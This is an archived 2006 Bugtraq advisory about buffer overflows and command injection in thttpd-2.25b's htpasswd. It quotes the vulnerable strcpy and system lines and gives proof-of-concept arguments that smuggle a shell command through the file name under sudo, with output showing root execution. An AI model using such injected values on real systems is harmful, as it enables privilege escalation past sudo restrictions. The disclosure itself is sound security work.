| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 5 Mar 2006 15:53:43 -0500 From: "Larry Cashdollar" <lcashdol@...il.com> To: bugtraq@...urityfocus.com Subject: htpasswd bufferoverflow and command execution in thttpd-2.25b. Hello bugtraq, I noticed a problem with thttpd-2.25b - Two buffer overflows and command execution in htpasswd.c. htpasswd is not installed setuid root, however in some user installations htpasswd might be executed via sudo. Exploting the above vulnerabilities would allow a non-priveledged user to circumvent sudo acls for example. line 189 strcpy(user,argv[2]); line 197 strcpy(l,line); line 215&216: sprintf(command,"cp %s %s",temp_template,argv[1]); system(command); If perhaps sudo is being used to limit what commands a user can execute as www, you could run other commands like so: sudo -u www /bin/htpasswd -c "blah;id>lpo" webauth sudo -u www /bin/htpasswd "blah;id>lpo" webauth larry@mog:~$ sudo /bin/htpasswd -c "blh;id>lp" www larry@mog:~$ sudo /bin/htpasswd "blh;id>lp" www Changing password for user www New password: Re-type new password: larry@mog:~$ cat lp uid=0(root) gid=0(root) groups=0(root) larry@mog:~$ sudo id We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password: Sorry, user larry is not allowed to execute '/usr/bin/id' as root on mog. I sent email to the thttpd mailing list, who were quick to respond and acknowledge the problem. They said the problem would be resolved in the next release. -- Larry Cashdollar http://vapid.dhs.org
Powered by blists - more mailing lists